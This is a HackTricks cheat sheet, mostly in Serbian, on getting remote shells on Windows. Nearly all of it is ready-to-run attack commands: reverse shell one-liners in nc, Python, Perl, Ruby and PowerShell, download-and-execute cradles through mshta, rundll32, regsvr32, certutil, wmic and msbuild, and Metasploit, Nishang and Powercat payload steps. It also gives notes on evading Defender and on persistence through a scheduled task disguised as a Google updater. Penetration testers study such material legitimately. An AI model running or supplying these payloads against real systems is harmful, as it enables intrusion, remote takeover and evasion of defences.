Shells - Windows

Reading time: 16 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Lolbas

The page lolbas-project.github.io is for Windows like https://gtfobins.github.io/ is for linux.
Očigledno, u Windows nema SUID fajlova niti sudo privilegija, ali je korisno znati kako neki binaries mogu biti (ab)used da izvedu neku neočekivanu akciju kao što je execute arbitrary code.

NC

bash
nc.exe -e cmd.exe <Attacker_IP> <PORT>

NCAT

žrtva

ncat.exe <Attacker_IP> <PORT>  -e "cmd.exe /c (cmd.exe  2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe  2>&1)"

attacker

ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl

SBD

sbd je prenosiva i sigurna zamena za Netcat. Radi na Unix-like sistemima i na Win32. Sa funkcijama kao što su snažna enkripcija, izvršavanje programa, prilagodljivi izvorni portovi i kontinuirano ponovno povezivanje, sbd pruža svestrano rešenje za TCP/IP komunikaciju. Za Windows korisnike, verzija sbd.exe iz Kali Linux distribucije može se koristiti kao pouzdana zamena za Netcat.

bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444


# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)

Python

bash
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

bash
#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSH

Attacker (Kali)

bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

Žrtva

bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Proces koji vrši mrežni poziv: powershell.exe
Payload zapisan na disk: NE (barem nigde nisam uspeo da pronađem koristeći procmon !)

bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Proces koji obavlja mrežni poziv: svchost.exe
Payload zapisan na disku: WebDAV client local cache

Jednolinijska komanda:

bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Više informacija o različitim Powershell Shells potražite na kraju ovog dokumenta

Mshta

bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
bash
mshta http://webserver/payload.hta
bash
mshta \\webdavserver\folder\payload.hta

Primer hta-psh reverse shell (koristite hta da preuzmete i izvršite PS backdoor)

xml
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

Možete veoma lako preuzeti i izvršiti Koadic zombie koristeći stager hta

hta primer

From here

xml
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

From here

xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Otkriveno od strane defender

Rundll32

Dll hello world example

bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Otkriven od strane defender

Rundll32 - sct

From here

xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

bash
use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

bash
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Otkriven od strane Defender

Regsvr32 – arbitrary DLL export sa /i argumentom (gatekeeping & persistence)

Pored učitavanja udaljenih scriptleta (scrobj.dll), regsvr32.exe učitava lokalni DLL i poziva njegove DllRegisterServer/DllUnregisterServer exporte. Custom loaderi često zloupotrebljavaju ovo da izvrše arbitrary code dok se stapaju sa potpisanim LOLBin-om. Dve tradecraft napomene viđene in the wild:

  • Gatekeeping argument: DLL izlazi osim ako specifični prekidač nije prosleđen preko /i:<arg>, npr. /i:--type=renderer da imitiraju Chromium renderer child procese. Ovo smanjuje slučajno izvršavanje i frustrira sandboxes.
  • Persistence: zakažite regsvr32 da pokrene DLL sa silent + visokim privilegijama i potrebnim /i argumentom, prerušeno kao zadatak ažuriranja:
powershell
Register-ScheduledTask \
-Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\<name>.dll\"") \
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \
-TaskName 'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}' \
-TaskPath '\\GoogleSystem\\GoogleUpdater' \
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \
-RunLevel Highest

Vidi takođe: ClickFix clipboard‑to‑PowerShell varijanta koja postavlja JS loader i kasnije perzistira pomoću regsvr32. Clipboard Hijacking

From here

html
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

bash
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

Možete vrlo lako preuzeti i izvršiti Koadic zombie koristeći stager regsvr

Certutil

Preuzmite B64dll, dekodirajte ga i izvršite.

bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Preuzmi B64exe, dekodiraj ga i pokreni.

bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Otkriven od strane defender

Cscript/Wscript

bash
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Otkriveno od strane defender

PS-Bat

bash
\\webdavserver\folder\batchfile.bat

Proces koji vrši mrežni poziv: svchost.exe
Payload zapisan na disku: WebDAV lokalni keš klijenta

bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
bash
\\10.8.0.3\kali\shell.bat

Otkriveno od strane defender

MSIExec

Napadač

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

Žrtva:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

Detektovano

Wmic

bash
wmic os get /format:"https://webserver/payload.xsl"

Primer xsl file from here:

xml
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>

Nije detektovano

Možete veoma lako preuzeti i izvršiti Koadic zombie koristeći stager wmic

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Možete koristiti ovu tehniku da zaobiđete Application Whitelisting i ograničenja Powershell.exe. Biće vam ponuđen PS shell.
Samo preuzmite ovo i pokrenite ga: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Nije detektovano

CSC

Kompajlirajte C# kod na ciljnoj mašini.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

Možete preuzeti osnovni C# reverse shell ovde: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Nije detektovano

Regasm/Regsvc

bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Nisam probao

https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182

Odbcconf

bash
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Nisam probao

https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2

Powershell Shells

PS-Nishang

https://github.com/samratashok/nishang

U folderu Shells nalazi se mnogo različitih shells. Da biste preuzeli i izvršili Invoke-PowerShellTcp.ps1 napravite kopiju skripte i dodajte na kraj fajla:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Pokreni web server koji poslužuje skriptu i izvrši je na strani žrtve:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Defender ga još ne detektuje kao zlonamerni kod (3/04/2019).

TODO: Proveri ostale nishang shells

PS-Powercat

https://github.com/besimorhino/powercat

Preuzmi, pokreni web server, pokreni listener i izvrši ga na strani žrtve:

powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender ga još ne detektuje kao maliciozni kod (3/04/2019).

Ostale opcije koje nudi powercat:

Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...

Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Empire

https://github.com/EmpireProject/Empire

Kreirajte powershell launcher, sačuvajte ga u fajl i preuzmite i izvršite.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Detektovano kao zlonamerni kod

MSF-Unicorn

https://github.com/trustedsec/unicorn

Kreirajte powershell verziju metasploit backdoor-a koristeći unicorn

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Pokrenite msfconsole koristeći kreirani resource:

msfconsole -r unicorn.rc

Pokrenite web server koji servira fajl powershell_attack.txt i izvršite na žrtvi:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Označeno kao maliciozan kod

Više

PS>Attack PS konzola sa nekim offensive PS modulima unapred učitanim (cyphered)
https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9
WinPWN PS konzola sa nekim offensive PS modulima i detekcijom proxy-a (IEX)

Reference

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks